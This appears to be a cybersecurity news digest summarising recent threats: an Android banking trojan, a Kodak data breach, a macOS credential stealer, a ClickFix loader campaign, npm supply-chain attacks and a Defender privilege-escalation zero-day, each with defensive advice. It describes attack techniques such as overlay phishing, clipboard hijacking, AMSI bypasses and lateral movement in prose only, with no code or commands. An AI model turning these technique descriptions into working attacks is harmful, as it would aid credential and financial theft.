Trending Topics

Rokarolla Android Trojan Emerges as Major Threat to Banking and Crypto Apps

A newly identified Android banking trojan known as Rokarolla is targeting 217 banking and cryptocurrency applications, combining financial theft with deep device control. The malware can steal lock screen PINs, intercept and send SMS messages, disable Google Play Protect, and harvest credentials via fraudulent overlay screens that sit atop legitimate apps. It also tampers with clipboard contents to silently redirect cryptocurrency transactions, swapping a victim's wallet address for the attacker's without raising suspicion.

Rokarolla's infection chain relies on social engineering and sideloading. Victims are lured to malicious websites impersonating popular apps like TikTok and Google Chrome, where they are prompted to download what appears to be an update or security tool. The initial dropper masquerades as Google Play Protect and immediately requests Android Accessibility permissions, claiming they are needed to "scan" or "secure" the device. Once granted, the malware installs its primary payload and gains extensive control - monitoring activity, capturing keystrokes, and intercepting one-time passcodes used in MFA flows.

With Accessibility permissions secured, Rokarolla shifts into credential theft and account takeover. It deploys pixel-perfect fake login screens over legitimate banking and cryptocurrency apps, tricking users into entering usernames, passwords, and MFA codes directly into attacker infrastructure. Combined with SMS interception and clipboard hijacking, this gives Rokarolla everything it needs to empty accounts, reroute crypto transfers, and maintain ongoing access.

For individuals, the best defense is to avoid sideloading entirely, install software only from the official Google Play Store, and treat any prompt to enable Accessibility for a "security" or "system cleaner" app as an immediate red flag.

For organizations, Rokarolla should be treated as a high-priority mobile security risk - especially in environments that support mobile banking, trading, or crypto custody. Security teams should reinforce mobile security awareness training, warn users explicitly against installing apps from links in SMS, email, or social media, and where possible prohibit sideloading through MDM or enterprise mobility management controls. Enterprise-managed Android devices should be monitored continuously for unauthorized Accessibility Service permissions, suspicious overlay-capable apps, and unusual clipboard or SMS behavior.

Any device suspected of infection should be isolated immediately, followed by password resets, session termination, and MFA re-enrollment from a known clean device. Reviewing network and endpoint telemetry for connections to known Rokarolla-associated domains or C2 infrastructure will help identify additional infected devices and scope the full impact of the campaign.

Kodak Confirms ShinyHunters Data Breach, Investigation Underway

Kodak has confirmed a data breach after the ShinyHunters extortion gang claimed it stole more than 2.2 million customer and corporate records. The company says it has only verified that a "limited amount" of data was accessed so far. The imaging giant, headquartered in upstate New York, reports that an unauthorized third party briefly accessed its data and that it has engaged external cybersecurity experts and law enforcement, while insisting there is currently no impact on its systems or operations.

ShinyHunters listed Kodak on its dark web leak site on June 15, 2026, alleging it exfiltrated over 2.2 million records containing customer personally identifiable information and internal corporate data. The group issued a June 18 deadline for Kodak to make contact or face a public leak and further "digital problems." So far, no proof samples have been posted to substantiate the full scope of the claim, and there is no independent confirmation that the volume or type of data described matches what was actually taken - leaving Kodak customers in an uneasy holding pattern while the investigation continues.

Kodak says it is still determining exactly what data was accessed and whether formal breach notifications are required under data protection laws. No service disruptions or operational outages tied to the incident have been reported.

Customers who have interacted with Kodak in recent years should monitor accounts for suspicious activity, stay alert to targeted phishing attempts referencing Kodak products or services, and watch for official notices from the company as regulators and investigators push for greater clarity on what ShinyHunters actually obtained.

Amos Stealer Targets macOS Keychain Files and Browser Passwords

Amos Stealer is an active information-stealing malware family tailored for macOS, now being used in fresh campaigns to raid Keychain files, browser passwords, cookies, and other sensitive data from Apple users. Building on the Atomic macOS Stealer lineage, this strain typically arrives via deceptive software downloads, fake installers, and social engineering lures that convince victims to run a malicious script or disk image and approve prompts that silently grant attackers access to their credentials.

Once on a system, Amos Stealer aggressively scans browser profiles for stored passwords, autofill data, and session cookies from Chromium-based browsers like Chrome and Edge, then copies the macOS Keychain database to extract corporate logins, tokens, and other high-value credentials. It also scans the user's home directory for developer and infrastructure artifacts such as SSH keys and Kubernetes configs, bundles everything into a compressed archive using native tools, and exfiltrates it to attacker-controlled infrastructure where it can be monetized or reused in follow-on intrusions against companies and cloud services.

This campaign is another clear signal that financially motivated threat actors now see macOS as a prime target - not a niche afterthought. The practical takeaway is straightforward: install macOS security updates promptly, enforce Gatekeeper and notarization, avoid pirated or unofficial app downloads, and treat any unexpected installer, password prompt, or "update" for a popular tool as suspicious until verified from a trusted source. In environments where a single stolen Keychain could unlock far more than one laptop, that verification step is not optional.

ClickFix Attack Chain Now Deploys New Potemkin Loader and RMMProject RAT

A new wave of ClickFix social engineering attacks is using fake browser security prompts and "fix" instructions to trick Windows users into running attacker-supplied commands that install a previously undocumented malware loader called Potemkin. Victims are funneled to a malicious or compromised site that displays a bogus security or update warning, then urged to copy and paste a PowerShell or installer command. That command pulls down an MSI that drops an HTML Application file used to execute the Potemkin loader on their system.

Potemkin is a custom 64-bit loader built for stealthy, long-lived remote control. It uses a domain generation algorithm driven by a 1,000-word dictionary to locate its command-and-control servers and reflectively loads follow-on payloads into memory rather than writing them to disk. Once active, it delivers RMMProject - a Lua-scriptable remote access trojan with modules to bypass Chromium's App Bound Encryption, steal browser passwords and autofill data, hide remote desktop control, take screenshots, execute arbitrary Lua scripts, and pull down additional modules on demand. It frequently arrives alongside EtherRAT, a backdoor that abuses the Ethereum blockchain to resolve C2 infrastructure and uses Cloudflare tunnels for persistence.

Researchers have observed attackers using this chain to disable Microsoft Defender via AMSI bypasses and registry edits, then move laterally with tools like WMIExec and SMBExec until they reach the domain controller. A single user's "click to fix" moment becomes a full network breach.

For defenders, treat any site that instructs a user to paste a PowerShell or Run command as hostile by default. Clamp down on HTA execution and unsigned MSI installs, and tune detection to look for Potemkin and RMMProject indicators, suspicious Cloudflare tunnels, and browser processes that suddenly lose their background or behave in ways consistent with known ClickFix-style lures.

Hackers Target npm Ecosystem with Malicious Packages and Supply Chain Attacks.

The npm ecosystem is under sustained attack, with threat actors publishing malicious packages and compromising maintainer accounts to turn trusted JavaScript libraries into silent delivery vehicles for malware and crypto theft. Recent campaigns linked to North Korean threat actors have seeded hundreds of bogus or backdoored packages - often disguised as logging tools, utilities, or crypto helpers - that blend into normal developer workflows and quietly execute information-stealing or wallet-draining code when installed.

One high-impact incident saw attackers phish an npm maintainer, seize control of their account, and push malicious updates to 18 widely used packages including debug, chalk, ansi-styles, and related dependencies, which collectively see over 2.6 billion weekly downloads. The injected payload ran in users' browsers to intercept and reroute cryptocurrency transactions. Even though the malicious versions were live for only a few hours, the potential blast radius spanned millions of applications and cloud environments that transitively depend on those libraries.

These campaigns fit a broader "Contagious Interview"-style playbook in which fake recruiters and developer-focused social engineering drive targets to use poisoned packages, Python payloads like InvisibleFerret, and encrypted loaders hidden in innocuous files - all aimed at siphoning corporate secrets, developer credentials, and crypto assets from compromised environments.

For teams that depend on npm, the message is straightforward: lock down maintainer accounts with strong MFA, scrutinize new or obscure packages, pin and audit dependencies, and layer in supply chain defenses that can flag unexpected post-install scripts or suspicious code changes before a single npm install becomes an entry point for a nation-state adversary.

Update: Microsoft Races to Patch RoguePlanet 0‑Day in Defender (CVE-2026-50656)

Microsoft is racing to ship a fix for RoguePlanet, a zero-day in Microsoft Defender that lets attackers escalate to SYSTEM on fully patched Windows 10 and 11, tracked as CVE-2026-50656. Until that patch lands, defenders need to treat Defender itself as a potential path for privilege escalation and tighten their exposure accordingly.

RoguePlanet is the latest in a string of Defender zero-days dropped publicly by the researcher known as Nightmare Eclipse, who has been protesting Microsoft's handling of security disclosures and bug bounties. The bug abuses a race condition in the Microsoft Malware Protection Engine, allowing a local attacker with low privileges to trigger a Defender scan workflow that ultimately spawns a command prompt running with SYSTEM rights - even after the June 2026 Patch Tuesday updates. ThreatLocker and other researchers have independently reproduced the exploit on fully updated machines, confirming this is not theoretical and that current patches do not close the hole.

Microsoft has acknowledged CVE-2026-50656 and confirmed a security update is in development. The company is also investigating whether the flaw can be triggered when real-time protection is disabled or when Defender runs in passive mode alongside third-party security tools - a question that matters for enterprises that treat Defender as a secondary control rather than a primary one. Given Microsoft's recent pattern with RedSun and UnDefend, and the pressure of repeated public exploit drops, defenders should expect either an out-of-band release or accelerated inclusion in the next Patch Tuesday cycle and plan testing windows now.

In practice, RoguePlanet is a local privilege escalation bug - but it pairs naturally with initial access vectors like phishing, browser exploits, or macro abuse to hand an attacker instant SYSTEM control after the first foothold. Organizations that rely heavily on Defender should immediately review where standard users can execute untrusted code, push stricter application control policies, and validate that endpoint detection and response tooling can identify unusual Defender-spawned processes or unexpected SYSTEM-level shells.

For individual users on fully patched Windows 10 and 11 machines, this is a moment to confirm that updates are enabled, avoid running unknown software, and consider adding hardened browser and email security measures while Microsoft works on a fix.